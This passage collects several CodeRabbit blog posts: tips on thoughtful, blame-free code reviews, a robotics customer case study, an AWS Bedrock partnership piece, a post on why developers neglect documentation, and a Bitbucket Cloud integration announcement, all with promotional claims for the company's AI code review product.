reality at work. This shows a difference between how engineers would like to do [code reviews](https://en.wikipedia.org/wiki/Code_review) and how their workplace makes them do it. We came across some opinions from engineers on X about code review. We think these are worth looking at. 
![](https://victorious-bubble-f69a016683.media.strapiapp.com/7b82ef2664cb53882a4f72d6a2d8200e90a24ae7fa52dbe166c81d2f5cf49ee4_adac4ab307.png) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/07a45af7d635e24e38f1f89a944722ea6f65df7792e76613512a3a8e6e768bb2_4577b006cf.png) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e96eea2c4a9245e3b71706516f1c17743bdce09f0666f0ea9251ffe2140dccfc_67ba0ffd96.png) Every one of these engineers has a valid reason for their opinion. And some with real-world experience to buttress why they hold such opinions. Based on the diverse takes we have seen on the subject of code review, we pretty much grouped them into: * The “**I like code review**” group consists of people who want code review regardless of the pass threshold set. They will adjust to any code review process structure set at their workplace. * The “**I like code review but**” group. Folks in this group want code review but with certain conditions, such as “**I like code review but don’t force me to write in your code style**,” “**I like code review, but we should automate with an AI agent**,“ etc. * The “**I don’t think code review is necessary**” group (not a popular group). Some people in this group believe that code review is just a way for someone to make you conform to their standards. Again, each group has a good reason for their choice. Our focus in this post is to share tips on thoughtful code reviews. First, let’s quickly detour to the code review blame culture. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6ca523e03f2c82303e4f8ae52059f3e6839140f9abd9f7d3803875d644b0099e_aa7024a9d5.png) ## The Code Review Blame Culture It is a known fact that the code review process can be a tedious exercise involving multiple back-and-forths between an author and a reviewer. If not properly managed, it can create an environment where the focus shifts to finding faults in code and apportioning blame when a bug escapes review. 
We call it the blame culture. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d8d207c4c5e89b4fdbac0586410100a9fcaaf0a89127e6e4bca197e4b989dc72_33e6d139e3.png) > Code review is about ensuring code quality, consistency, and best practices. Authors should not view code reviews as antagonistic. Similarly, feedback from reviewers should be issue-based. The blame culture thrives when teams behave contrary to these principles: personal attacks, nitpicking, defensiveness, etc. If a bug manages to escape code review, what comes to mind should not be “**Who is to blame?**” but “**What went wrong and how can we fix it?**” We call it the team mindset. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a92ea9469d4b465f76165c40f6d117afed0944325c3f65612f32d6d268d9a81a_646b5b4fa3.png) > The blame culture is toxic and should have no place in code review. Now that we have established that, let’s move on to how to do code reviews thoughtfully. ## How to Do Thoughtful Code Reviews > There is no one-size-fits-all approach to code review. However, teams should approach it with transparent processes and standards. A thoughtful code review goes beyond finding errors to promoting knowledge sharing, collaboration, and empathy. The following are some elements that we think a thoughtful code review should have: ### Do a preliminary self-review (own your work) You should first self-review your code. Before clicking “***Create Pull Request***,” give your work a second look. No, this doesn’t mean you don’t trust or believe in yourself. It means that you understand that you can make mistakes. More importantly, it means you value the reviewer’s time and effort. > Check your code and tests for errors and bugs before submitting it for peer review. Additionally, focus on **high-risk vs. low-risk changes** during self-review. * **High-risk changes**, those affecting critical business logic, security, or performance, deserve extra scrutiny. 
* **Low-risk changes**, such as minor refactors or docs updates, can be reviewed with a lighter touch. By prioritizing your review efforts, you help ensure that major issues are caught early while keeping the process efficient. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c996dab4c81c919d5762239b395d408ce8fd026b569b60e0f85b4f4640dc4bf6_4034850e86.png) ### Smaller PRs It is hard (almost impossible) to thoroughly review a large set of changes. Nobody wants to review 1,000+ lines of code in one go. It’s exhausting, error-prone, and delays feedback. Break big changes into **small, logical PRs**; it keeps things moving faster. Big tech companies like Google and Facebook, along with every well-run engineering team, encourage a culture of small commits to prevent merge hell. > **Rule of thumb:** If a PR takes more than **10-15 minutes** to review, it’s too big. ### Write/review with empathy Consider the feelings of others when you write or review code. Following best practices and writing clean code means you care about who takes a look at your work. Empathy is putting yourself in the shoes of the other person. > For example, feedback such as “I find this function a bit unusual. Do you mind giving it a second look?” is more empathetic than “This is a bad function. You should do a rewrite.” PR comments shouldn't be personal or vague. ❌ You didn't check for a null value. ✅ This input value could be null, causing a server error. If null, a client error should be thrown. > The second: - targets the code, NOT the person - is clear about a suggested improvement. Good code reviews aren’t just about finding bugs. They’re about **helping your team write better code.** If your feedback sounds like an attack, nobody will listen. ### Automate code review processes No one likes going through the same thing over and over again. You easily get bored and frustrated doing so. Frankly speaking, code review cycles can get you into that bored and frustrated spot. 
This is why you should try to abstract away redundant manual steps. Use [automation tools](https://www.coderabbit.ai/blog/how-to-automate-typescript-code-reviews-with-coderabbit) to streamline your workflows. Linters are great for automating parts of your code review process. > You could also employ AI Code agents to automate certain levels of code review. The human element will always be important in code review (at least for the foreseeable future). While linters and formatters help teams follow agreed practices, AI-based code review automation tools let you go further, using AI-powered linting to suppress noise and bubble up impactful issues. > Note: AI-based tools are prone to hallucinations. Fine-tuning or instructing the LLMs on how you want the code to be reviewed may be essential in some cases to get the desired output. ### Agree to a standard as a team We all have our own biases as humans. Each of us has a certain way we like things to be. And that’s okay. However, we should not impose our biases (or preferences) on others. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6d68bb27c186147a2b2c4bd7833ceae96d373e4b86736e3c2a7d9c87ac5096fe_74dfc27450.png) > Do not impose your code style on others. ### Set the pass threshold Approving code should not be “**as the reviewer wishes.**” Your team should set a clear pass threshold. Set the minimum standards code submissions must meet to merge into the main codebase. > Examples of pass thresholds you could set include performance benchmarks, security, and readability. [GitHub Checks](https://docs.github.com/en/pull-requests/collaborating-with-pull-requests/collaborating-on-repositories-with-code-quality-features/about-status-checks) can help you automate and enforce pass thresholds. By requiring specific checks to pass before a pull request can be merged, you ensure consistent code quality and speed up the code review process. 
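One way to turn an agreed pass threshold into an automated check is a small script that a CI job runs on each pull request; a non-zero exit code makes the job fail, which a required status check can then use to block the merge. The sketch below is only an illustration: the metric names, the limits, and the `failed_checks` helper are hypothetical, and a real team would feed in numbers produced by its own test, benchmark, and scanning tools.

```python
import sys
from dataclasses import dataclass


@dataclass(frozen=True)
class Threshold:
    name: str
    limit: float
    higher_is_better: bool


# Hypothetical thresholds; each team would agree on its own names and values.
THRESHOLDS = [
    Threshold("test_coverage_percent", 80.0, higher_is_better=True),
    Threshold("p95_latency_ms", 250.0, higher_is_better=False),
    Threshold("high_severity_vulnerabilities", 0.0, higher_is_better=False),
]


def failed_checks(metrics: dict[str, float], thresholds: list[Threshold] = THRESHOLDS) -> list[str]:
    """Return a message for every threshold the metrics fail to meet."""
    failures = []
    for t in thresholds:
        value = metrics.get(t.name)
        if value is None:
            # A missing metric counts as a failure so gaps are not silently ignored.
            failures.append(f"{t.name}: no value reported")
        elif t.higher_is_better and value < t.limit:
            failures.append(f"{t.name}: {value} is below the minimum of {t.limit}")
        elif not t.higher_is_better and value > t.limit:
            failures.append(f"{t.name}: {value} is above the maximum of {t.limit}")
    return failures


if __name__ == "__main__":
    # Sample values for illustration only.
    sample = {
        "test_coverage_percent": 86.5,
        "p95_latency_ms": 180.0,
        "high_severity_vulnerabilities": 0.0,
    }
    problems = failed_checks(sample)
    for problem in problems:
        print(problem)
    sys.exit(1 if problems else 0)
```

Writing the threshold down as data rather than leaving it to each reviewer's judgment is what keeps approval from being "as the reviewer wishes."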
![](https://victorious-bubble-f69a016683.media.strapiapp.com/1c9b4680fe0e561a5c9e087601c3e0896a78850d678bd2201f3a2a23130f69cd_94e134488a.png)

### Clear feedback

Provide specific and actionable feedback. Where you don’t have the right context, ask questions and don't make assumptions. A good code review isn’t just criticism; it’s a collaboration. Be specific, be actionable, and ask questions when you’re unsure.

* **Bad:** *This is wrong. Fix it.*
* **Better:** *This approach might have a race condition. Could we use a lock here instead?*

You don’t have to solve every problem; just help the author think through their solution.

## Summary

Code review is a time-consuming process. Approaching it thoughtfully makes it easier for all parties involved. If done right, it can help your team improve code quality, ensure consistency, and promote collaboration, openness, and a learning culture. How does your organization do it? And how do you want it done?

Agora Robotics & CodeRabbit: AI-Powered Code Reviews Streamline Robotics Software

Manpreet Kaur — Mon, 24 Feb 2025 00:00:00 GMT

**At a Glance:**

**Primary contact:** [Paul Popescu, CEO](https://www.linkedin.com/in/holopix?miniProfileUrn=urn%3Ali%3Afs_miniProfile%3AACoAAAu5jqkBRk1gMQq3snD3HJzAYSDWgLQeFlo) and [Ioana Calen, COO](https://www.linkedin.com/in/ioana-calen-510a6455/overlay/about-this-profile/)

**Primary technology:** Python, C++

**Challenge:** Manual code reviews are a bottleneck in the development of critical robotics software

[Agora Robotics](https://www.agorarobotics.com/), a leading provider of autonomous mobile robots (AMRs) for warehouse automation, struggled to maintain software development velocity while preserving code quality. With a distributed development team working on complex robotics software, the company deployed CodeRabbit's AI-powered code review platform to ship code faster. With CodeRabbit, code quality and dev productivity for their autonomous navigation and control systems improved significantly, allowing the team to focus more on innovation while consistently upholding the highest standards of code quality and safety.

### **Key Challenges: Small team struggles to ship features at the speed of customer demands**

Manual code reviews are time-consuming and inconsistent, often consuming up to 30% of a senior developer's time, which significantly slows down feature development velocity. The code for robotics algorithms and safety-critical systems demands experienced software developers for a thorough review. The robotics development team was small, and resources were limited; consequently, the review process became a bottleneck. Bugs caught in production resulted in costly downtime and safety issues, and fixes were difficult when the robots were deployed in remote locations. Typos and minor errors can slip through in large PRs. Inadequate error handling introduces hard-to-detect bugs. Feedback can be delayed during busy development cycles.
### **Improving Dev Productivity with AI Code Reviews**

Agora Robotics deployed CodeRabbit's AI code review solution for robotics. The onboarding was done in less than one business day, and it took less than another business day to integrate the solution into their existing GitHub workflow and receive helpful AI code review recommendations.

Their codebase in GitHub has specific rules for merging code into the "main" branch. Those rules sometimes introduced bugs that would surface early in manual review. At other times, the bugs appeared only in QA, when a specific part of the code was triggered. This slowed down their testing process, because a new PR with fixes had to be created, reviewed, and merged. With CodeRabbit, they can avoid this scenario and catch these bugs at the review stage.

**Key Features Used:**

CodeRabbit not only offers a fresh perspective on your code (improving it through clean code principles and fostering new habits for cleaner, more maintainable code) but also boosts collaboration through a suite of powerful features:

* **Cross-team code review coordination:** Seamlessly manage reviews without waiting for individual engineer availability.
* **Automated documentation:** Simplify understanding of critical code functionality with AI-generated insights.
* **CI/CD and DevOps integration:** Implement improvements quickly through smooth pipeline integration.
* **Enhanced safety checks:** Benefit from suggestions refining error handling and code robustness.
* **Adaptive learning:** Leverage team comments and tailor AI recommendations to fit project-specific best practices.
* **Automated code analysis:** Get real-time AI analysis of complex robotics algorithms while streamlining workflows by eliminating tedious manual tasks.
* **Sequence diagrams:** Generate diagrams that clearly illustrate how new features integrate into the system.

These combined capabilities ensure that CodeRabbit enhances code quality and accelerates development workflows.
They also found the Sequence Diagrams generated by CodeRabbit useful, especially in the case of feature PRs when lots of new "strings" get attached to their system. Also, the fact that CodeRabbit learns from their comments made the AI take user feedback into account for the next time the same code block comes up. They found the chat feature to be a nice touch, detecting robotics-specific code patterns and potential issues. **Results and Impact:** Reduction of code review time by at least 20%. Fewer PR iterations accelerate the development cycle. Decrease in production bug incidents. Knowledge transfer within the team and AI feedback on best practices enhance overall coding habits. Improved documentation coverage across the codebase. Enhanced capacity to meet rapid deployment schedules. *"CodeRabbit has transformed our development process by providing intelligent, automated code reviews that understand the complexities of robotics software. Our team can now focus on innovation while maintaining the highest code quality and safety standards."* — [**Paul Popescu**](https://www.linkedin.com/in/holopix?miniProfileUrn=urn%3Ali%3Afs_miniProfile%3AACoAAAu5jqkBRk1gMQq3snD3HJzAYSDWgLQeFlo)**, CEO of** [**Agora Robotics**](https://www.agorarobotics.com/)**.** ### **Conclusion:** CodeRabbit's successful deployment at Agora Robotics shows what is possible when AI code reviews are applied to highly technical domains. The platform's ability to understand and validate complex robotic code while maintaining the highest safety standards has proven extremely valuable to its development team. ### **Start Your Journey with CodeRabbit** Let us help your development team see the power of AI-driven code reviews. Setup takes less than 5 minutes, and no credit card is required. [**Begin Your Free Trial**](https://app.coderabbit.ai/login?free-trial&) today and see how CodeRabbit can transform your development workflow. Questions? 
Our [**support team**](https://www.coderabbit.ai/contact-us/support) is ready to assist.

Accelerating Code Delivery: How CodeRabbit and AWS Use AI to Revolutionize Code Reviews

Sahil Mohan Bansal — Thu, 20 Feb 2025 00:00:00 GMT

In today’s AI-powered software development landscape, the rapid pace of code creation, fueled by large language models (LLMs) and ever-advancing Gen AI reasoning capabilities, has become both a blessing and a challenge for engineering teams. While teams can generate code faster than ever, thanks to the new AI coding assistants on the market, the ability to ship code to production has become limited by the tedious and slow manual code review process. Manual code reviews have become a bottleneck, delaying feature releases and sometimes compromising code quality by missing critical bugs and errors.

Enter [**CodeRabbit**](https://www.coderabbit.ai/), the industry’s leading AI Code Review platform, which helps automate the first pass of code reviews and ultimately allows engineering teams to ship better quality code faster and safer. In partnership with AWS, especially by using Amazon Bedrock to integrate with Anthropic’s Claude 3.5 Sonnet, CodeRabbit is transforming how software development teams manage code quality, speed up PR merge time, and reduce bugs in production.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/dda461a725ef9814a9d415e631d85208bfabb252f4cf0bf1d9ed30ded8199367_eea0f0e406.png)

**The Bottleneck of Manual Code Reviews**

Manual code reviews are tedious, error-prone, and reliant on the availability of other engineers, who may not have expertise in the language they are being asked to review. Interpersonal team dynamics also find their way into the code review process, with nitpicks that slow the software release cycle. In the age of AI coding assistants, manual code reviews are like driving a passenger car on an F1 race track. You need to change the engine under the hood to adapt to the environment.

* **Increased Code Volume:** With generative AI driving code creation, the sheer amount of code being generated is skyrocketing, and manual code reviews simply cannot keep up.
* **Manual Review Limitations:** Human error will occasionally creep in, especially when engineers are overworked and simply can’t keep up with the rapid pace of software development. Manual reviews are tedious and error-prone.
* **Impact on Delivery:** The delay caused by manual reviews slows down code ship velocity, hindering the release of new features. Engineering teams may also be called upon to fix bugs that slipped through to production.
* **Developer Morale:** Let’s face it, at the end of the day, what engineers enjoy the most is building new features, not writing documentation or inserting unit tests. Time spent in manual code reviews is time taken away from what engineers would rather do.

### **The CodeRabbit Solution: Automated AI Code Reviews**

**CodeRabbit** is designed to address these manual code review challenges head-on. Here’s how:

* **Merge PRs Faster:** By automating the first pass of the code review process, CodeRabbit significantly reduces the turnaround time from sending the PR to merging it. Customers can merge PRs 4x faster using AI code reviews.
* **Free Up Dev Time:** Eliminate repetitive and boring tasks such as documentation or unit test insertion. Reduce the number of dev cycles, and cut the number of engineers involved in reviews from two to one.
* **Improve Code Quality:** Automated reviews not only catch bugs faster but also enforce coding best practices and provide refactor suggestions, eventually leading to more robust and maintainable code.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/43e3cec74dc4594353f86720b277a40edd58417f60f685d0a1df4c20747a7233_0a8233968b.png?key=Km8inSeTiuyCG1KeoAijSzlL)

Here are some of the key features through which CodeRabbit delivers these benefits:

* **Automated Error Detection** Automated AI code reviews detect errors or bugs that manual reviews may miss. Get rid of tedious and error-prone manual reviews and watch your team’s bug count go down in days.
* **1-Click Committable Fixes** CodeRabbit goes beyond just identifying issues in your code. Commit the recommended changes into a pull request with just one click, directly from your existing Git workflow.
* **Linters / SAST Integrations** Out-of-the-box integrations with 20+ linters and SAST tools. No configuration changes are required, saving your team time and effort. AI models coupled with linters deliver much more accurate reviews.
* **Automated Learnings** AI code reviews continuously improve over time with automated learning. Users can also fine-tune the learnings through a chat interface. Your code reviews are customized to your coding standards.
* **Dashboards and Reports** Visibility into dev productivity improvement with metrics such as the number of issues fixed and human time saved. Automated reports deliver the state of your repos, including PR summaries, release notes, etc.
* **Review Customization** To tailor the AI code reviews to your project's specific needs, you can set up path-based custom code review instructions or use advanced AST-based custom rules.

### **Powering Innovation with AWS**

CodeRabbit is excited to partner with AWS to bring cutting-edge AI code reviews to its customers. CodeRabbit supports Anthropic Claude with Amazon Bedrock, utilizing the generative AI capabilities along with the cloud infrastructure and services provided by AWS.

Amazon Bedrock stands at the forefront of enterprise AI innovation, offering a comprehensive solution that democratizes access to advanced generative AI capabilities. This fully managed service seamlessly integrates high-performing foundation models and LLMs from leading AI companies through a unified API, along with a broad set of other capabilities, enabling organizations to build and scale sophisticated AI applications without the undifferentiated heavy lifting of managing infrastructure.
Amazon Bedrock's marketplace comes with over 100 popular models, complemented by powerful features that optimize both cost and performance. These include:

* Prompt Caching
* Intelligent Prompt Routing
* Model Distillation

What sets Amazon Bedrock apart is its emphasis on enterprise-grade security, private customization capabilities, and seamless integration with the broader AWS ecosystem. By addressing critical concerns around data sovereignty, scalability, and responsible AI deployment, Amazon Bedrock is helping organizations across industries transform their operations and drive innovation.

### CodeRabbit Deployment Models

![](https://victorious-bubble-f69a016683.media.strapiapp.com/3f4820c489a5beb6a804c043ed04e7ab65ab5fd935337fc074caf3face7465db_1a590ab54e.png)

To meet the needs of different customers, CodeRabbit provides two different deployment models:

**SaaS:** Quick and easy to get started. It takes just two clicks to integrate with your preferred Git platform. There is no infrastructure to manage, and you get immediate value from AI Code Reviews.

**Self-Hosted:** CodeRabbit provides a container image that you can run on Amazon EKS or ECS. You host the infrastructure, and all your data stays in your AWS VPC to help you meet even the most stringent security and compliance needs.

Customers can subscribe to CodeRabbit SaaS with a credit card and pay monthly or annually. Customers can also use our [AWS Marketplace](https://aws.amazon.com/marketplace/seller-profile) listing to pay for the CodeRabbit self-hosted solution. Get in touch with our sales team at [sales@coderabbit.ai](mailto:sales@coderabbit.ai) for volume discounts for the self-hosted deployment model.

**Real-world Benefits of AI-Powered Software Development**

As AI models powering modern software development environments continue to evolve, the need for rapid, reliable code reviews will only grow so that engineering teams are not blocked from shipping code because of the manual effort spent in code reviews.
The AWS and CodeRabbit AI Code Review solution represents a significant step forward in this domain, and the proof, as they say, is in the pudding built by our customers.

Here is what David Deal, Sr Director of Engineering at The Linux Foundation, had to say about AI Code Reviews:

*“CodeRabbit has proven invaluable in uncovering discrepancies between our documentation and actual test coverage. Highlighting inconsistencies like missing null checks or mismatched value ranges prevented numerous potential issues.”*

And here is what William Wallace, CEO of BuiltRight, had to say about implementing AI Code Reviews:

*“We found CodeRabbit through Product Hunt and gave it a try. It was super quick and easy to get started - took us less than 10 minutes. AI code reviews helped us save about 25% of the total time that developers were spending on manual code reviews, freeing up crucial bandwidth from the code review cycles.”*

You can read more about their use case and benefits in [our case study](https://www.coderabbit.ai/case-studies).

**Join the Revolution**

Whether you’re a startup or a large enterprise, CodeRabbit is here to help you ship better quality code faster and safer. Start your [14-day free trial](https://coderabbit.ai/) with CodeRabbit today. You can pay for CodeRabbit through the [AWS Marketplace](https://aws.amazon.com/marketplace/pp/prodview-wkkkre4fgelwq) utilizing your existing AWS spend commitments and join the revolution of automated AI code reviews!

Challenges Developers Face in Creating API and Code Documentation

Aravind Putrevu — Thu, 13 Feb 2025 00:00:00 GMT

Most developers prioritize writing code over documentation. It's not that documentation is difficult, but in a deadline-driven environment, writing docs often takes a back seat, much like fixing that production bug on Friday afternoon or cleaning up untested code.

But why is that? Why do documentation tasks consistently get pushed down in our development priorities? In this blog, we explore the psychological quirks, technical hurdles, and organizational pressures that contribute to this great documentation dilemma. We'll take a look at the impact of poor documentation on software development projects and discuss some strategies for escaping the undocumented situation.

## Before that, Documentation and Categories:

* Internal documentation: This is for the folks who work directly with the codebase – your fellow developers, testers, and anyone else involved in the nitty-gritty of the project. It's like the secret sauce recipe, providing guidance on best practices, technical instructions, and how to navigate those complex algorithms that only you and a select few need to understand.
* External documentation: This is for the outside world – the users, customers, and developers who use your software or integrate with it. Think API references, user manuals, and those all-important wikis that can make or break a project's adoption.

In this blog we will focus specifically on internal developer documentation that other developers can use to debug and learn about the codebase.

## The Agile Reality: "We'll Document It Later"

At a time when two-week sprints and daily deployments are the norm, documentation often becomes the first casualty. We've all been there – the sprint is ending, the PR needs to be merged, and there's pressure to ship the feature. "I'll add the API docs in the next sprint", we tell ourselves while knowing deep down that "next sprint" might never come.

The reality of agile development makes this worse.
When choosing between updating API documentation or tackling the next story in the backlog, guess which one usually wins? Story points and velocity metrics rarely account for documentation work. It's like technical debt, but quieter – until it isn't.

> Let us know if you are a dev team that runs a separate docs sprint!

Here's what typically happens:

```typescript
// Three snapshots of the same function over time (illustrative only;
// they are not meant to compile together in one file).

// Sprint 1: Initial implementation
async function processOrder(orderId) {
  // TODO: Add API docs
  // ...
}

// Sprint 3: Added new parameter
async function processOrder(orderId, options) {
  // TODO: Update API docs
  // ...
}

// Sprint 5: Breaking change
async function processOrder(orderId, options, callback) {
  // TODO: Really need to update those docs...
  // ...
}
```

The "we'll document it later" mentality has real consequences. That TODO comment becomes a permanent fixture, the API spec remains unclear, and six months later, your team spends hours in a meeting room trying to figure out why the payment service is sending callbacks that the order service isn't expecting.

> Have you ever run a CTRL+F for TODO in your IDE? You are an elite engineering team if the search turns up fewer than 10 occurrences (assuming that your team uses TODO comments ;)).

## What stops developers from documenting Code?

A common misconception in software development is that clean, readable code eliminates the need for documentation. While descriptive function signatures and variable names help, they can’t tell the complete story of why certain decisions were made.

### The "It's Obvious" Syndrome

> "It's obvious – the function name tells you everything!"

Even the cleanest code can't tell the whole story. Sure, good variable names and clear functions help, but they can't explain why you chose that specific approach, what edge cases you considered, or what future maintainers should watch out for. Clean code might tell you how it works, but documentation tells you why it works that way.

### The Moving Target Problem

Modern development moves fast.
Imagine your codebase is constantly evolving. New features are being added, APIs are changing, and code is being refactored. Meanwhile, your documentation starts getting stale. What was accurate last month might be misleading today, and downright wrong by next quarter. This documentation drift happens naturally. Developers are moving fast, making many changes to code each day. Each small code change can make a piece of documentation obsolete. And it's not just about API endpoints, class methods change, function signatures evolve, and database schemas shift. Before you know it, your once accurate documentation becomes a minefield of outdated information. For example: * That API endpoint you documented now has three new required parameters * The error codes section hasn't been updated in six months * The example code snippets don't even compile anymore * The authentication flow has completely changed, but the docs still show the old way This is why keeping documentation in sync with code is such a challenge - it's not a one-and-done task, it's a constant battle against drift. > While the code will not necessarily stop working with documentation drift, unit tests must stay current for the code to work. Well-written tests do more than verify functionality - they demonstrate proper API usage through concrete examples. By writing meaningful test cases instead of focusing solely on coverage metrics, developers create an always-accurate reference for how the code should behave. Though tests shouldn't be the only form of documentation, they provide reliable, self-updating examples that complement written docs. ### Psychological Factors (Because we're complex creatures, too) Let's be honest - there's more to our documentation problem than just time constraints. Writing good documentation challenges us in ways that coding doesn't. First, it requires a different mindset. When coding, we talk to computers in precise, logical terms. But documentation? 
We need to communicate with humans, anticipate their questions, and explain complex concepts clearly. Many developers find this mental switch challenging. Then there's the perfectionism trap. We fear our documentation won't be good enough. What if we explain something wrong? What if we miss important details? This fear often leads to procrastination - after all, no documentation is better than wrong documentation, right? (Spoiler: it's not) There's also the motivation factor. Pushing code and seeing it work gives us an immediate sense of achievement. Documentation doesn't provide that same instant gratification. The benefits often only become apparent weeks or months later, when someone (including future you) needs to understand how something works. It's a mix of unfamiliar skills, fear of imperfection, and delayed rewards that makes documentation feel like such a burden. ## The Impact of Poor Documentation The consequences of poor documentation can be far-reaching, impacting not only individual developers but the entire project. * Reduced productivity & increased code maintenance - developers spend an insane amount of time ramping up on code, leading to delays. * Increased bugs and errors - Misinterpreted code, leading to more bugs and errors. * Hindered collaboration - Poor documentation makes it difficult for developers to work together. * Loss of knowledge - As team members leave, their undocumented knowledge goes with them. ## What Actually Works In the order of priority, here is a list that worked for us. Use Meaningful Comments: There is no time to do the full documentation cycle; start with comments. Use comments to explain the "why" behind your code, not just the "what." Think of them as little love notes to your future self (or the poor soul who must maintain your code after you). Keep it Concise and Up-to-Date: No one wants to wade through a wall of text. Keep your documentation (even if they are comments) concise, focused, and to the point. 
And most importantly, keep it up-to-date! Outdated documentation is worse than no documentation at all. It's like giving someone a map to a city that no longer exists – frustrating and ultimately useless. Embrace AI Dev Documentation Tools: Modern AI tools can now automatically generate and maintain code documentation - from Docstrings in Python to JSDoc comments in JavaScript and Javadoc in Java. They can analyze your code, understand its structure, and suggest meaningful documentation that explains parameters, return types, and function purposes. While they won't replace thoughtful dev documentation, they can help jumpstart the process and keep reference documentation up to date. Making use of README: Most teams treat README files in private repos as an afterthought - "it's internal, who needs it?" But treating your private repo's README with the same care as you would an open-source project can save hours of onboarding time. Include the project's purpose, how dev docs are written, common gotchas, and links to key internal resources like API docs, runbooks, and architecture diagrams. Think of all the questions a new team member would ask in their first week - that's what belongs in your README. Use Visual Aids: Lastly, make an architecture or sequence diagram if you can’t write a full page of developer documentation. A picture is worth a thousand words, especially when it comes to explaining complex concepts. Use diagrams, flowcharts, and other visual aids to make your dev documentation more engaging and easily understood. Ultimately, great documentation comes down to building it into your team's DNA. Start small by making doc updates part of your PR checklist, discuss documentation in code reviews, and recognize team members who leave helpful comments or update guides. Over time you'll see a shift from "I'll document it later" to "this isn't done until it's documented." 
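As a small illustration of the first and third points above, here is a sketch of a function whose JSDoc comment records the "why" alongside the reference details. Everything in it is hypothetical: the `retryDelayMs` name, the default values, and the reasons given in the comment are invented for this example and do not describe any real service.

```typescript
/**
 * Returns how long to wait before retrying a failed order callback.
 *
 * Why exponential backoff: (hypothetical reason) a struggling downstream
 * service recovers faster when callers slow down instead of retrying at
 * a fixed rate.
 * Why the cap: (hypothetical reason) nobody should wait minutes for a
 * single retry, so no delay exceeds `capMs`.
 *
 * @param attempt - 1-based retry attempt number.
 * @param baseMs - Delay before the first retry, in milliseconds.
 * @param capMs - Upper bound for any single delay, in milliseconds.
 * @returns The delay in milliseconds.
 * @throws RangeError if `attempt` is not a positive integer.
 */
function retryDelayMs(attempt: number, baseMs = 200, capMs = 5000): number {
  if (!Number.isInteger(attempt) || attempt < 1) {
    throw new RangeError("attempt must be a positive integer");
  }
  // The delay doubles with every attempt and is clamped to capMs.
  return Math.min(capMs, baseMs * Math.pow(2, attempt - 1));
}
```

The signature already says what the function takes and returns; the comment earns its place by recording the decisions that the code cannot express, which is the part a future maintainer is most likely to need.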
## Tying It All Together Good documentation isn't about perfection – it's about building bridges between today's solutions and tomorrow's problems. While we can't eliminate the challenge of documentation, we can make it more manageable through small, consistent steps and a shift in team culture. * Start with meaningful comments that explain the "why" * Make documentation updates part of your PR process * Use READMEs effectively, even for internal projects * Embrace visual aids when text isn't enough * Remember, outdated docs are worse than no docs Next time you're about to skip documentation, remember: you're not just writing it for others – you're writing it for your future self. Because in six months, we're all strangers to our own code. At [CodeRabbit](https://coderabbit.ai), we believe in iterative improvement of code quality. For example, we generate contextual code documentation on every pull request. This feature is currently in beta. Try generating code documentation by signing up for a free trial!

CodeRabbit now supports AI Code Reviews with Bitbucket Cloud

Sahil Mohan Bansal — Tue, 04 Feb 2025 00:00:00 GMT

We are thrilled to announce that CodeRabbit [now supports](https://docs.coderabbit.ai/platforms/bitbucket-cloud/) AI Code Reviews with Bitbucket Cloud! This integration, currently in beta, delivers a wider choice of supported Git platforms including GitHub, GitLab, Azure DevOps, and Bitbucket. CodeRabbit’s AI Code Reviews help customers automate the first pass of code reviews, reduce manual time spent in the review cycle, catch bugs and issues that can be overlooked due to human error, and improve the overall quality of their code. With support for Bitbucket Cloud, we are making it even easier for developers to automate away manual and tedious tasks, thus freeing up their time to focus on what they care about: developing new features. ### **Benefits of using CodeRabbit:** * **Automated code reviews:** automatically reviews your code and identifies potential issues, such as bugs, security vulnerabilities, and refactoring opportunities. * **Best-in-class reviews:** logical reasoning capabilities provided by Gen-AI models integrated with Linters deliver a high signal-to-noise ratio for best-in-class AI reviews * **Configurable Learnings:** Your code reviews are customizable to your specific coding standards. AI automatically learns over time and improves future reviews * **Docstrings:** Save time with unit-test insertion and docstring generation. Focus developer time on more productive activities while automating tedious tasks * **Just minutes to get started:** just give access to your Bitbucket, create a new PR, and AI code reviews will kick in automatically Customers who have implemented AI code reviews have reported * 2x-4x faster PR merge time * 25% or more reduction in the amount of dev time spent on code reviews * reduction in the number of bugs in production in the first week after implementing CodeRabbit *“What sets CodeRabbit apart is its deep understanding of code structure through AST analysis. 
It's not just pattern matching - it's intelligent code comprehension that integrates seamlessly into our existing workflows” – Ron Efroni, Founder, Floxdev*

Check out more [customer testimonials](https://www.coderabbit.ai/customers).

### **How to get started with CodeRabbit and Bitbucket:**

1. Start a free trial or log in to your existing account. Select Bitbucket as your Git provider at login.
2. Create a new Bitbucket user as a service account and name it “CodeRabbit.” Then, associate this user with the workspace to which you would like to give CodeRabbit access.
3. Generate an App Password to enable integration between CodeRabbit and your Bitbucket repositories. Enter the App Password in the CodeRabbit UI. This will automatically configure the required webhook for seamless integration.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/15dd259a1bc88d46ddbba9a67c3825c895f9cd8c9ecc6fc271b01d3ea528916c_10b189cbbc.png)

*Log in with Bitbucket as your Git provider*

![](https://victorious-bubble-f69a016683.media.strapiapp.com/f67e05da0af45eaa96c659cdd71340ef955857f732584fc1cb0b16c7df3b69a1_d5f89ff0c8.png)

*Enter your App Password in the CodeRabbit UI*

You can read more [detailed documentation](https://docs.coderabbit.ai/platforms/bitbucket-cloud/) on the Bitbucket integration and join us on our [Discord server](https://discord.gg/coderabbit) for real-time support.

Please note that Bitbucket support is currently in beta, so there may be a few kinks that will be resolved over time. Please report any issues on the “[Bitbucket Cloud Support](https://discord.com/channels/1134356397673414807/1334660150623076473)” Discord channel.

Start your [14-day free trial](https://app.coderabbit.ai/login?free-trial) today and implement AI Code Reviews to immediately improve your code quality, reduce bugs in production, and free up developer time.

From Manual Reviews to AI-Powered Insights: The Linux Foundation's Code Review Transformation

Manpreet Kaur — Wed, 29 Jan 2025 00:00:00 GMT

